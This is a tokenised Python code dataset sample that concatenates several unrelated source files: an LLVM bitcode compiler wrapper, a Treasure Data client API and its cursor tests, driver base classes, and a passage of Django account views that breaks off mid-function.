<EOL> if self . outputFilename is not None : <EOL> return self . outputFilename <EOL> elif self . isCompileOnly : <EOL> ( path , base ) = os . path . split ( self . inputFiles [ <NUM_LIT:0> ] ) <EOL> ( root , ext ) = os . path . splitext ( base ) <EOL> return '<STR_LIT>' . format ( root ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def getArtifactNames ( self , srcFile , hidden = False ) : <EOL> ( srcpath , srcbase ) = os . path . split ( srcFile ) <EOL> ( srcroot , srcext ) = os . path . splitext ( srcbase ) <EOL> if hidden : <EOL> objbase = '<STR_LIT>' . format ( srcroot ) <EOL> else : <EOL> objbase = '<STR_LIT>' . format ( srcroot ) <EOL> bcbase = '<STR_LIT>' . format ( srcroot ) <EOL> path = '<STR_LIT>' <EOL> if self . outputFilename is not None : <EOL> path = os . path . dirname ( self . outputFilename ) <EOL> return [ os . path . join ( path , objbase ) , os . path . join ( path , bcbase ) ] <EOL> def dump ( self ) : <EOL> _logger . debug ( '<STR_LIT>' . format ( self . compileArgs ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . inputFiles ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . linkArgs ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . objectFiles ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . outputFilename ) ) <EOL> for srcFile in self . inputFiles : <EOL> _logger . debug ( '<STR_LIT>' . format ( srcFile ) ) <EOL> ( objFile , bcFile ) = self . getArtifactNames ( srcFile ) <EOL> _logger . debug ( '<STR_LIT>' . format ( srcFile , objFile , bcFile ) ) <EOL> class ClangBitcodeArgumentListFilter ( ArgumentListFilter ) : <EOL> def __init__ ( self , arglist ) : <EOL> localCallbacks = { '<STR_LIT>' : ( <NUM_LIT:1> , ClangBitcodeArgumentListFilter . outputFileCallback ) } <EOL> super ( ClangBitcodeArgumentListFilter , self ) . __init__ ( arglist , exactMatches = localCallbacks ) <EOL> def outputFileCallback ( self , flag , filename ) : <EOL> self . outputFilename = filename <EOL> class FileType ( object ) : <EOL> revMap = { } <EOL> @ classmethod <EOL> def getFileType ( cls , fileName ) : <EOL> fileP = Popen ( [ '<STR_LIT:file>' , os . path . realpath ( fileName ) ] , stdout = PIPE ) <EOL> output = fileP . communicate ( ) [ <NUM_LIT:0> ] <EOL> output = output . decode ( ) <EOL> if '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_EXECUTABLE <EOL> if '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . MACH_EXECUTABLE <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_SHARED <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . MACH_SHARED <EOL> elif '<STR_LIT>' in output : <EOL> return cls . ARCHIVE <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_OBJECT <EOL> elif '<STR_LIT>' in output and '<STR_LIT:object>' in output : <EOL> return cls . MACH_OBJECT <EOL> else : <EOL> return cls . UNKNOWN <EOL> @ classmethod <EOL> def init ( cls ) : <EOL> for ( index , name ) in enumerate ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> setattr ( cls , name , index ) <EOL> cls . revMap [ index ] = name <EOL> FileType . init ( ) <EOL> def attachBitcodePathToObject ( bcPath , outFileName ) : <EOL> ( root , ext ) = os . path . splitext ( outFileName ) <EOL> _logger . debug ( '<STR_LIT>' . format ( bcPath , outFileName , ext ) ) <EOL> if ext not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( outFileName , FileType . getFileType ( outFileName ) ) ) <EOL> return <EOL> f = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' , delete = False ) <EOL> absBcPath = os . path . abspath ( bcPath ) <EOL> f . write ( absBcPath . encode ( ) ) <EOL> f . write ( '<STR_LIT:\n>' . encode ( ) ) <EOL> _logger . debug ( pprint . pformat ( '<STR_LIT>' . format ( absBcPath , f . name ) ) ) <EOL> f . flush ( ) <EOL> os . fsync ( f . fileno ( ) ) <EOL> f . close ( ) <EOL> if ( sys . platform . startswith ( '<STR_LIT>' ) ) : <EOL> objcopyCmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , outFileName , '<STR_LIT>' , darwinSegmentName , darwinSectionName , f . name , '<STR_LIT>' , outFileName ] <EOL> else : <EOL> objcopyCmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' . format ( elfSectionName , f . name ) , outFileName ] <EOL> orc = <NUM_LIT:0> <EOL> try : <EOL> if os . path . getsize ( outFileName ) > <NUM_LIT:0> : <EOL> objProc = Popen ( objcopyCmd ) <EOL> orc = objProc . wait ( ) <EOL> except OSError : <EOL> os . remove ( f . name ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> os . remove ( f . name ) <EOL> if orc != <NUM_LIT:0> : <EOL> _logger . error ( '<STR_LIT>' . format ( orc ) ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> class BuilderBase ( object ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> self . cmd = cmd <EOL> self . isCxx = isCxx <EOL> if prefixPath : <EOL> self . prefixPath = prefixPath <EOL> if self . prefixPath [ - <NUM_LIT:1> ] != os . path . sep : <EOL> self . prefixPath = self . prefixPath + os . path . sep <EOL> if not os . path . exists ( self . prefixPath ) : <EOL> errorMsg = '<STR_LIT>' . format ( self . prefixPath ) <EOL> _logger . error ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> else : <EOL> self . prefixPath = '<STR_LIT>' <EOL> def getBitcodeFileName ( self , argFilter ) : <EOL> ( dirs , baseFile ) = os . path . split ( argFilter . getOutputFilename ( ) ) <EOL> bcfilename = os . path . join ( dirs , '<STR_LIT>' . format ( baseFile ) ) <EOL> return bcfilename <EOL> class ClangBuilder ( BuilderBase ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> super ( ClangBuilder , self ) . __init__ ( cmd , isCxx , prefixPath ) <EOL> def getBitcodeCompiler ( self ) : <EOL> cc = self . getCompiler ( ) <EOL> return cc + [ '<STR_LIT>' ] <EOL> def getCompiler ( self ) : <EOL> if self . isCxx : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath ) ] <EOL> else : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath ) ] <EOL> def getBitcodeArglistFilter ( self ) : <EOL> return ClangBitcodeArgumentListFilter ( self . cmd ) <EOL> def extraBitcodeArgs ( self , argFilter ) : <EOL> bcPath = self . getBitcodeFileName ( argFilter ) <EOL> return [ '<STR_LIT>' , bcPath ] <EOL> def attachBitcode ( self , argFilter ) : <EOL> bcname = self . getBitcodeFileName ( argFilter ) <EOL> outFile = argFilter . getOutputFilename ( ) <EOL> attachBitcodePathToObject ( bcname , outFile ) <EOL> class DragoneggBuilder ( BuilderBase ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> super ( DragoneggBuilder , self ) . __init__ ( cmd , isCxx , prefixPath ) <EOL> def getBitcodeCompiler ( self ) : <EOL> pth = os . getenv ( '<STR_LIT>' ) <EOL> cc = self . getCompiler ( ) <EOL> cmd = cc + [ '<STR_LIT>' , driverDir , '<STR_LIT>' . format ( pth ) , '<STR_LIT>' ] <EOL> _logger . debug ( cmd ) <EOL> return cmd <EOL> def getCompiler ( self ) : <EOL> pfx = '<STR_LIT>' <EOL> if os . getenv ( '<STR_LIT>' ) is not None : <EOL> pfx = os . getenv ( '<STR_LIT>' ) <EOL> if self . isCxx : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath , pfx ) ] <EOL> else : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath , pfx ) ] <EOL> def getBitcodeArglistFilter ( self ) : <EOL> return ArgumentListFilter ( self . cmd ) <EOL> def attachBitcode ( self , argFilter ) : <EOL> pass <EOL> def extraBitcodeArgs ( self , argFilter ) : <EOL> return [ ] <EOL> def getBuilder ( cmd , isCxx ) : <EOL> compilerEnv = '<STR_LIT>' <EOL> cstring = os . getenv ( compilerEnv ) <EOL> pathPrefix = os . getenv ( llvmCompilerPathEnv ) <EOL> _logger . info ( '<STR_LIT>' . format ( cstring ) ) <EOL> if pathPrefix : <EOL> _logger . info ( '<STR_LIT>' . format ( pathPrefix ) ) <EOL> if cstring == '<STR_LIT>' : <EOL> return ClangBuilder ( cmd , isCxx , pathPrefix ) <EOL> elif cstring == '<STR_LIT>' : <EOL> return DragoneggBuilder ( cmd , isCxx , pathPrefix ) <EOL> elif cstring == None : <EOL> errorMsg = '<STR_LIT>' + compilerEnv <EOL> _logger . critical ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> else : <EOL> errorMsg = compilerEnv + '<STR_LIT:=>' + str ( cstring ) + '<STR_LIT>' <EOL> _logger . critical ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> def buildObject ( builder ) : <EOL> objCompiler = builder . getCompiler ( ) <EOL> objCompiler . extend ( builder . cmd ) <EOL> proc = Popen ( objCompiler ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> sys . exit ( rc ) <EOL> def buildAndAttachBitcode ( builder ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> if ( len ( af . inputFiles ) == <NUM_LIT:0> or <EOL> af . isAssembly or <EOL> af . isAssembleOnly or <EOL> ( af . isDependencyOnly and not af . isCompileOnly ) or <EOL> af . isPreprocessOnly ) : <EOL> _logger . debug ( '<STR_LIT>' ) <EOL> _logger . debug ( af . __dict__ ) <EOL> return <EOL> newObjectFiles = [ ] <EOL> hidden = not af . isCompileOnly <EOL> if len ( af . inputFiles ) == <NUM_LIT:1> and af . isCompileOnly : <EOL> srcFile = af . inputFiles [ <NUM_LIT:0> ] <EOL> ( objFile , bcFile ) = af . getArtifactNames ( srcFile , hidden ) <EOL> if af . outputFilename is not None : <EOL> objFile = af . outputFilename <EOL> bcFile = builder . getBitcodeFileName ( af ) <EOL> buildBitcodeFile ( builder , srcFile , bcFile ) <EOL> attachBitcodePathToObject ( bcFile , objFile ) <EOL> else : <EOL> for srcFile in af . inputFiles : <EOL> ( objFile , bcFile ) = af . getArtifactNames ( srcFile , hidden ) <EOL> if hidden : <EOL> buildObjectFile ( builder , srcFile , objFile ) <EOL> newObjectFiles . append ( objFile ) <EOL> buildBitcodeFile ( builder , srcFile , bcFile ) <EOL> attachBitcodePathToObject ( bcFile , objFile ) <EOL> if not af . isCompileOnly : <EOL> linkFiles ( builder , newObjectFiles ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def linkFiles ( builder , objectFiles ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> outputFile = af . getOutputFilename ( ) <EOL> cc = builder . getCompiler ( ) <EOL> cc . extend ( objectFiles ) <EOL> cc . extend ( af . objectFiles ) <EOL> cc . extend ( af . linkArgs ) <EOL> cc . extend ( [ '<STR_LIT>' , outputFile ] ) <EOL> proc = Popen ( cc ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( str ( cc ) ) ) <EOL> sys . exit ( rc ) <EOL> def buildBitcodeFile ( builder , srcFile , bcFile ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> bcc = builder . getBitcodeCompiler ( ) <EOL> bcc . extend ( af . compileArgs ) <EOL> bcc . extend ( [ '<STR_LIT:-c>' , srcFile ] ) <EOL> bcc . extend ( [ '<STR_LIT>' , bcFile ] ) <EOL> _logger . debug ( '<STR_LIT>' . format ( bcc ) ) <EOL> proc = Popen ( bcc ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( bcFile , srcFile ) ) <EOL> sys . exit ( rc ) <EOL> def buildObjectFile ( builder , srcFile , objFile ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> cc = builder . getCompiler ( ) <EOL> cc . extend ( af . compileArgs ) <EOL> cc . append ( srcFile ) <EOL> cc . extend ( [ '<STR_LIT:-c>' , '<STR_LIT>' , objFile ] ) <EOL> _logger . debug ( '<STR_LIT>' . format ( cc ) ) <EOL> proc = Popen ( cc ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> _logger . warning ( '<STR_LIT>' . format ( objFile , srcFile ) ) <EOL> sys . exit ( rc ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> try : <EOL> from urllib . parse import quote as urlquote <EOL> except ImportError : <EOL> from urllib import quote as urlquote <EOL> class DatabaseAPI ( object ) : <EOL> def list_databases ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . get ( "<STR_LIT>" ) as res : <EOL> code , body = res . status , res . read ( ) <EOL> if code != <NUM_LIT:200> : <EOL> self . raise_error ( "<STR_LIT>" , res , body ) <EOL> js = self . checked_json ( body , [ "<STR_LIT>" ] ) <EOL> result = { } <EOL> for m in js [ "<STR_LIT>" ] : <EOL> name = m . get ( "<STR_LIT:name>" ) <EOL> count = m . get ( "<STR_LIT:count>" ) <EOL> created_at = self . _parsedate ( self . get_or_else ( m , "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> updated_at = self . _parsedate ( self . get_or_else ( m , "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> permission = m . get ( "<STR_LIT>" ) <EOL> result [ name ] = [ count , created_at , updated_at , None , permission ] <EOL> return result <EOL> def delete_database ( self , db ) : <EOL> """<STR_LIT>""" <EOL> with self . post ( "<STR_LIT>" % urlquote ( str ( db ) ) ) as res : <EOL> code , body = res . status , res . read ( ) <EOL> if code != <NUM_LIT:200> : <EOL> self . raise_error ( "<STR_LIT>" , res , body ) <EOL> return True <EOL> def create_database ( self , db , params = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } if params is None else params <EOL> with self . post ( "<STR_LIT>" % urlquote ( str ( db ) ) , params ) as res : <EOL> code , body = res . status , res . read ( ) <EOL> if code != <NUM_LIT:200> : <EOL> self . raise_error ( "<STR_LIT>" , res , body ) <EOL> return True </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> try : <EOL> from unittest import mock <EOL> except ImportError : <EOL> import mock <EOL> import pytest <EOL> from tdclient import cursor <EOL> from tdclient import errors <EOL> from tdclient . test . test_helper import * <EOL> def setup_function ( function ) : <EOL> unset_environ ( ) <EOL> def test_cursor ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . rowcount == - <NUM_LIT:1> <EOL> assert td . description == [ ] <EOL> def test_cursor_close ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . close ( ) <EOL> assert td . api . close . called <EOL> def test_cursor_execute ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( return_value = <NUM_LIT> ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . execute ( "<STR_LIT>" ) == <NUM_LIT> <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . _description == [ ] <EOL> def test_cursor_execute_format_dict ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( return_value = <NUM_LIT> ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . execute ( "<STR_LIT>" , args = { "<STR_LIT:i>" : <NUM_LIT> , "<STR_LIT:t>" : "<STR_LIT>" } ) == <NUM_LIT> <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . _description == [ ] <EOL> def test_cursor_execute_format_tuple ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . execute ( "<STR_LIT>" , args = ( <NUM_LIT> , "<STR_LIT>" ) ) <EOL> def test_cursor_executemany ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . api . query = mock . MagicMock ( side_effect = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> td . _do_execute = mock . MagicMock ( ) <EOL> assert td . executemany ( "<STR_LIT>" , [ { "<STR_LIT:i>" : <NUM_LIT:1> } , { "<STR_LIT:i>" : <NUM_LIT:2> } , { "<STR_LIT:i>" : <NUM_LIT:3> } ] ) == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> td . api . query . assert_called_with ( "<STR_LIT>" , db = "<STR_LIT>" ) <EOL> assert td . _do_execute . called <EOL> assert td . _rows is None <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == - <NUM_LIT:1> <EOL> assert td . _description == [ ] <EOL> def test_check_executed ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> assert td . _executed is None <EOL> with pytest . raises ( errors . ProgrammingError ) as error : <EOL> td . _check_executed ( ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed ( ) <EOL> def test_do_execute_success ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed = mock . MagicMock ( return_value = True ) <EOL> td . api . job_status = mock . MagicMock ( return_value = "<STR_LIT:success>" ) <EOL> td . api . job_result = mock . MagicMock ( return_value = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] ) <EOL> td . api . show_job = mock . MagicMock ( return_value = { "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] } ) <EOL> td . _do_execute ( ) <EOL> assert td . _check_executed . called <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == <NUM_LIT:3> <EOL> assert td . _description == [ ( "<STR_LIT>" , None , None , None , None , None , None ) , ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_do_execute_error ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . api . job_status = mock . MagicMock ( side_effect = [ "<STR_LIT:error>" ] ) <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . _do_execute ( ) <EOL> def test_do_execute_wait ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) , db = "<STR_LIT>" , wait_interval = <NUM_LIT:5> , wait_callback = mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _check_executed = mock . MagicMock ( return_value = True ) <EOL> td . api . job_status = mock . MagicMock ( side_effect = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:success>" ] ) <EOL> td . api . job_result = mock . MagicMock ( return_value = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] ) <EOL> td . api . show_job = mock . MagicMock ( return_value = { "<STR_LIT>" : [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] } ) <EOL> with mock . patch ( "<STR_LIT>" ) as t_sleep : <EOL> td . _do_execute ( ) <EOL> t_sleep . assert_called_with ( <NUM_LIT:5> ) <EOL> assert td . wait_callback . called <EOL> assert td . _check_executed . called <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> assert td . _rownumber == <NUM_LIT:0> <EOL> assert td . _rowcount == <NUM_LIT:3> <EOL> assert td . _description == [ ( "<STR_LIT>" , None , None , None , None , None , None ) , ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_result_description ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> assert td . _result_description ( None ) == [ ] <EOL> assert td . _result_description ( [ [ "<STR_LIT>" , "<STR_LIT:int>" ] ] ) == [ ( "<STR_LIT>" , None , None , None , None , None , None ) ] <EOL> def test_fetchone ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . _rows ) <EOL> assert td . fetchone ( ) == [ "<STR_LIT:foo>" , <NUM_LIT:1> ] <EOL> assert td . fetchone ( ) == [ "<STR_LIT:bar>" , <NUM_LIT:1> ] <EOL> assert td . fetchone ( ) == [ "<STR_LIT>" , <NUM_LIT:2> ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchone ( ) <EOL> def test_fetchmany ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . _rows ) <EOL> assert td . fetchmany ( <NUM_LIT:2> ) == [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] ] <EOL> assert td . fetchmany ( ) == [ [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchmany ( ) <EOL> def test_fetchall ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . _rows = [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> td . _rownumber = <NUM_LIT:0> <EOL> td . _rowcount = len ( td . _rows ) <EOL> assert td . fetchall ( ) == [ [ "<STR_LIT:foo>" , <NUM_LIT:1> ] , [ "<STR_LIT:bar>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:2> ] ] <EOL> with pytest . raises ( errors . InternalError ) as error : <EOL> td . fetchall ( ) <EOL> def test_show_job ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . show_job ( ) <EOL> td . api . show_job . assert_called_with ( "<STR_LIT>" ) <EOL> def test_job_status ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . job_status ( ) <EOL> td . api . job_status . assert_called_with ( "<STR_LIT>" ) <EOL> def test_job_result ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> td . _executed = "<STR_LIT>" <EOL> td . job_result ( ) <EOL> td . api . job_result . assert_called_with ( "<STR_LIT>" ) <EOL> def test_cursor_callproc ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . callproc ( "<STR_LIT:f>" ) <EOL> def test_cursor_nextset ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . nextset ( ) <EOL> def test_cursor_setinputsizes ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . setinputsizes ( <NUM_LIT> ) <EOL> def test_cursor_setoutputsize ( ) : <EOL> td = cursor . Cursor ( mock . MagicMock ( ) ) <EOL> with pytest . raises ( errors . NotSupportedError ) as error : <EOL> td . setoutputsize ( <NUM_LIT> ) </s>
<s> class Driver ( object ) : <EOL> def get_config ( self ) : <EOL> return { } <EOL> class SyncDriverError ( Exception ) : <EOL> def __init__ ( self , message , errorno ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . errorno = errorno <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class SyncDriver ( Driver ) : <EOL> def sync ( self , args ) : <EOL> raise NotImplementedError <EOL> class LockDriverError ( Exception ) : <EOL> def __init__ ( self , message , errorno ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . errorno = errorno <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class LockDriver ( Driver ) : <EOL> def check_lock ( self , args ) : <EOL> raise NotImplementedError <EOL> def add_lock ( self , args ) : <EOL> raise NotImplementedError <EOL> def remove_lock ( self , args ) : <EOL> raise NotImplementedError <EOL> class ServiceDriverError ( Exception ) : <EOL> def __init__ ( self , message , errorno ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . errorno = errorno <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class ServiceDriver ( Driver ) : <EOL> def stop ( self , args ) : <EOL> raise NotImplementedError <EOL> def start ( self , args ) : <EOL> raise NotImplementedError <EOL> def restart ( self , args ) : <EOL> raise NotImplementedError <EOL> def reload ( self , args ) : <EOL> raise NotImplementedError <EOL> class ReportDriverError ( Exception ) : <EOL> def __init__ ( self , message , errorno ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . errorno = errorno <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class ReportDriver ( Driver ) : <EOL> def report ( self , args ) : <EOL> raise NotImplementedError </s>
<s> """<STR_LIT>""" <EOL> from treeio . core . rendering import render_to_response <EOL> from django . template import RequestContext <EOL> from django . http import HttpResponseRedirect <EOL> from django . core . urlresolvers import reverse <EOL> from treeio . account . forms import AccountForm , AccountPasswordForm , SettingsForm , MassActionForm <EOL> from treeio . core . decorators import treeio_login_required , handle_response_format <EOL> from treeio . core . models import ModuleSetting , Perspective <EOL> from treeio . account . models import NotificationSetting <EOL> from treeio . core . conf import settings <EOL> from jinja2 import Markup <EOL> @ treeio_login_required <EOL> def account_view ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> try : <EOL> contacts = profile . contact_set . exclude ( trash = True ) <EOL> except : <EOL> contacts = [ ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , '<STR_LIT>' : contacts } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def watchlist ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> watchlist = profile . subscriptions . all ( ) <EOL> context = { '<STR_LIT>' : profile , '<STR_LIT>' : watchlist } <EOL> return render_to_response ( '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def account_edit ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> if request . POST : <EOL> form = AccountForm ( request . POST , instance = profile ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = AccountForm ( instance = profile ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def account_password ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> profile = request . user . profile <EOL> if request . POST : <EOL> if '<STR_LIT>' not in request . POST : <EOL> form = AccountPasswordForm ( request . user , request . POST ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = AccountPasswordForm ( request . user ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ treeio_login_required <EOL> def settings_view ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> user = request . user . profile <EOL> try 